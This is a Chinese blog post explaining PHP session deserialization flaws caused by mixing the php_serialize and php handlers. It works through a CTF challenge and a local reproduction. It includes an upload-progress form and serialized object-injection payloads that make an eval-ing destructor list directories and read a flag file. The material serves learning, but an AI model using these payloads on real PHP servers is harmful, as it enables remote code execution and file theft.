PHP反序列化与Session

0x00前言:

php存储session有三种模式,php_serialize, php, binary

这里着重讨论php_serialize和php的不合理使用导致的安全问题

关于session的存储,java是将用户的session存入内存中,而php则是将session以文件的形式存储在服务器某个tmp文件中,可以在php.ini里面设置session.save_path存储的位置

 

设置序列化规则则是

注意,php_serialize在5.5版本后新加的一种规则,5.4及之前版本,如果设置成php_serialize会报错

session.serialize_handler = php              一直都在            它是用 |分割
session.serialize_handler = php_serialize    5.5之后启用         它是用serialize反序列化格式分割

首先看session.serialize_handler = php序列化的结果

 

它的规则是$_SESSION是个数组,数组中的键和值中间用 | 来分割,值如果是数组或对象按照序列化的格式存储

 

然后看看session.serialize_handler = php_serialize的序列化结果

它是全程按照serialize的格式序列化了$_SESSION这个数组

它比php的格式多了个最前面多了个 "a:2:{ ...." 也就是$_SESSION这个数组有2个元素,还有个区别在于,它的键名也表明了长度和属性,中间用 ; 来隔开键值对

虽然2个序列化格式本身没有问题,但是如果2个混合起用就会造成危害

形成原理是在用session.serialize_handler = php_serialize存储的字符可以引入 | , 再用session.serialize_handler = php格式取出$_SESSION的值时 "|"会被当成键值对的分隔符

比如,我先用php存了个数组,在$_SESSION['b']的值里面加入 | ,并在之后写成一个数组的序列化格式

 

如果正常的用php_serialize解析,它返回的是$_SESSION['b']是个长度为44的字符串

 

如果用php进行解析,发现它理解为一个很长的名字的值是一个带了2个元素的数组

 

 

0x01一道CTF题目:

题目是道网上常常拿来做例子的一道php反序列化题目

题目连接:http://web.jarvisoj.com:32784/

源码已经给出,如下

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

能够查看phpinfo,于是发现全局用的php_serialize进行序列化,而这个页面是以php来进行解析的

那么可以利用上面的理论进行事先准备个$this->mdzz= 'payload' 进行攻击

问题是怎么将payload写入session,这里php有个上传文件的会将文件名写入session的技巧

https://bugs.php.net/bug.php?id=71101

原文意思大致要求满足以下2个条件就会写入到session中

session.upload_progress.enabled = On
上传一个字段的属性名和session.upload_progress.name的值相,这里根据上面的phpinfo信息看得出,值为PHP_SESSION_UPLOAD_PROGRESS,即
name="PHP_SESSION_UPLOAD_PROGRESS"

写好脚本

<html>
<head>
    <title>upload</title>
</head>
<body>
    <form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="1" />
        <input type="file" name="file" />
        <input type="submit" />
    </form>
</body>

</html>

注意这里 "PHP_SESSION_UPLOAD_PROGRESS" 的 value不能为空

这里根据题目的类,需要修改mdzz这个属性,于是写个php生成payload,因为看看phpinfo的禁用函数,能调用系统的函数都被ban了,于是只能用var_dump,scandir和file_get_contents来读取flag

<?php
class OowoO
{
    public $mdzz = "var_dump(scandir('./'));";
   
    function __destruct()
    {
        eval($this->mdzz);
    }
}
$a = new OowoO();
echo serialize($a) . "<br>";
?>

生成payload

O:5:"OowoO":1:{s:4:"mdzz";s:24:"var_dump(scandir('./'));";}
当然这个是不行的,我们要稍微改一下,"要转义,前面加个|
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:24:\"var_dump(scandir('./'));\";}

先随便传个文件,把包抓下来,把文件名改成我们的payload

 

能够查看到根目录的情况了

 网上有个payload是直接用

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}

我因为太菜最先没想到,于是去看了下phpinfo的session的存放位置,有个/opt/lampp/估计是装的的xampp这个集成的环境,而这个集成环境的web页面放在htdocs目录下的

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"var_dump(scandir('/opt/lampp/'));\";}
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:40:\"var_dump(scandir('/opt/lampp/htdocs/'));\";}

 看到flag文件了

接下来是读取,这里额外提一句file_put_contents和fie_get_contents能够使用php://filter伪协议,但这里用var_dump导出来,不是文件包含,看下源码就能找打答案

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:89:\"var_dump(file_get_contents('/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php'));\";}

 

0x03环境复现:

因为最先学习这道题的时候想看看session文件,于是在本地搭建了个环境

<?php
ini_set('session.serialize_handler', 'php');

session_start();
var_dump($_SESSION);
echo "<br>";
class test
{
    public $wd; 
    function __destruct()
    {
        eval($this->wd);
    }
}
?>

最先我用一个文件直接生产用php_serialize规则序列化并直接存在session中

然后访问模拟搭建的页面,漏洞能够利用成功

 

 

于是我改用文件上传的形式,结果死活没法生成正确的session

再看看session文件,啥都没写入

这是为什么,想了一晚上,看了看phpinfo的信息,上传保留session的enabled是默认开启的,session.upload_progress.name也是默认

 

上传的html页面能在上面的ctf题中成功运行,说明不是上传的请求头格式问题

payload如果写入session文件中也能正常触发phpinfo

但是现在的问题是session写不进去,于是估计是配置问题了。

我再读了遍:https://bugs.php.net/bug.php?id=71101

发现它给出它的运行环境的配置,于是我按照它的ini对应的配置,再配了遍自己的php.ini,发现很多配置都是被注释掉的,也就是默认的值

最后成功执行了

 

 

 session文件也写入了,可以仔细看看写的session文件内容

因为用php解析了,为了使解析格式正确,它直接丢掉了些 },如果正常解析的话,可以看出多了很多键值对,但是正是因为用php解析, |前面的所有字符都当做键名,而后面的payload则被反序列化,造成漏洞利用

 

再回到为什么之前不行,现在可以运行的问题上,最后我测试了是 session.upload_progress.cleanup这个参数

session.upload_progress.cleanup = Off

这个要为Off或者0,才能将上传的内容保存到session,但是,php默认的是On,所有最先死活传不上去

 

posted @ 2019-03-01 17:50  sijidou  阅读(1799)  评论(0编辑  收藏  举报